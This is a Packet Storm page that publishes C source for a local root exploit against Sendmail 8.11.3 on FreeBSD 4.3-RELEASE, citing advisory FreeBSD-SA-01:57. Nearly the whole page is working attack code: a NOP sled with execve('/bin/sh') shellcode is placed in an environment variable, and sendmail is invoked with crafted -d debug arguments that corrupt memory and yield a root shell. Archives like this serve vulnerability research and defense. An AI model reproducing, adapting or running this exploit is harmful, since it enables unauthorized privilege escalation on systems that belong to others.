Sendmaild.c is a local root exploit for Sendmail on BSD. Exploits the bug discussed in FreeBSD-SA-01:57. Tested on FreeBSD 4.3-RELEASE with Sendmail 8.11.3.
af378464c45ce674f69dcef1b241d4a304679c343fa1f55700fd04fe7f29c324/*
* local r00t exploit for sendmail on *bsd*
*
* tested on: FreeBSD 4.3-RELEASE (sendmail version 8.11.3)
*
* writed by CrZ [crazy_einstein@yahoo.com] LimpidByte
*
* credits by Cade Cairnss: https://packetstormsecurity.org/advisories/freebsd/FreeBSD-SA-01:57.sendmail
*/
#include <sys/param.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#define NOPNUM 1024
char shellcode[] =
"\xeb\x16\x5e\x31\xc0\x8d\x0e\x89"
"\x4e\x08\x89\x46\x0c\x8d\x4e\x08"
"\x50\x51\x56\x50\xb0\x3b\xcd\x80"
"\xe8\xe5\xff\xff\xff/bin/sh";
int main(int argc, char *argv[])
{
char *egg, s[256], *av[3], *ev[2];
egg = (char *)malloc(strlen(shellcode) + NOPNUM + 5);
if (egg == NULL) {
perror("malloc()");
exit(-1);
}
sprintf(egg, "EGG=");
memset(egg + 4, 0x90, NOPNUM);
sprintf(egg + 4 + NOPNUM, "%s", shellcode);
sprintf(s,"-d4294900452-4294900452.196\n-d4294900453-4294900453.252\n-d4294900454-4294900454.191\n-d4294900455-4294900455.191");
av[0] = "/usr/sbin/sendmail";
av[1] = s;
av[2] = NULL;
ev[0] = egg;
ev[1] = NULL;
execve(*av, av, ev);
return 0;
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed